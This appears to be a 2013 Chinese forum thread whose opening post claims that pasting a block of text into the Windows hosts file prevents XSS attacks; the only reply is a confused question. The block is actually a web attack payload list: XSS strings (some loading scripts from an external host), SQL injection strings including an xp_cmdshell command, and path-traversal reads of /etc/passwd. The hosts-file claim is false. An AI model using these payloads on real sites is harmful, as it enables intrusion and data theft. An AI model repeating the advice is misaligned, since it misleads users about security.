碧阳busters吧 关注:26贴子:794
  • 1回复贴,共1

【关于最近的代码爆吧问题】0.0

只看楼主收藏回复

在windows中找到 C:\Windows\System32\drivers\etc\hosts, 然后使用记事本 文段编辑器 写字板都可以打开 打开这个文件 然后添加 下面给出的代码 理论上来讲就可以回避此类的XXS攻击了
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<s&#99;ript>alert(’XSS’)</script>
<img src="javas&#99;ript:alert(’XSS’)">
<script>alert(/"Vulnerable/")</script>.jsp
"
../../../../../../../etc/passwd
../../../../../windows/win.ini
/index.html
?.jsp
?.jsp
&lt;script&gt;alert(’Vulnerable’);&lt;/script&gt
<script>alert(’Vulnerable’)</script>
?sql_debug=1
a\.aspx
a.jsp/<script>alert(’Vulnerable’)</script>
a/
a?<script>alert(’Vulnerable’)</script>
"><script>alert(’Vulnerable’)</script>
’;exec master..xp_cmdshell ’dir c: > c:/inetpub/wwwroot/?.txt’--&&
">
&
&SESSION_ID={SESSION_ID}&SESSION_ID=
1 union all select pass,0,0,0,0 from customers where fname=
../../../../../../../../etc/passwd
../../../../../../../../windows/system.ini
/../../../../../../../../windows/system.ini
’’;!--"<XSS>=&{()}
<IMG SRC="javascript:alert(’XSS’);">
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x09;ascript:alert(’XSS’);">
<IMG SRC="jav&#x0A;ascript:alert(’XSS’);">
<IMG SRC="jav&#x0D;ascript:alert(’XSS’);">
"<IMG SRC=java/0script:alert(/"XSS/")>";’ > out
<IMG SRC=" javascript:alert(’XSS’);">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert(’XSS’)">
<BODY ONLOAD=alert(’XSS’)>
<IMG DYNSRC="javascript:alert(’XSS’)">
<IMG LOWSRC="javascript:alert(’XSS’)">
<BGSOUND SRC="javascript:alert(’XSS’);">
<br size="&{alert(’XSS’)}">
<LAYER SRC="/info/upimg/allimg/080417/0946110.jpg"></SCRIPT>
<IMG SRC="javascript:alert(’XSS’)"
<!--#exec cmd="/bin/echo ’<SCRIPT SRC’"--><!--#exec cmd="/bin/echo ’=http://xss.ha.ckers.org/a.js></SCRIPT>’"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" ’’ SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a=’>’" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin’--
’ or 0=0 --
" or 0=0 --
or 0=0 --
’ or 0=0 #
" or 0=0 #
or 0=0 #
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a
hi") or ("a"="a


IP属地:北京1楼2013-05-19 19:30回复
    你想说什么..


    来自手机贴吧2楼2013-05-22 22:58
    回复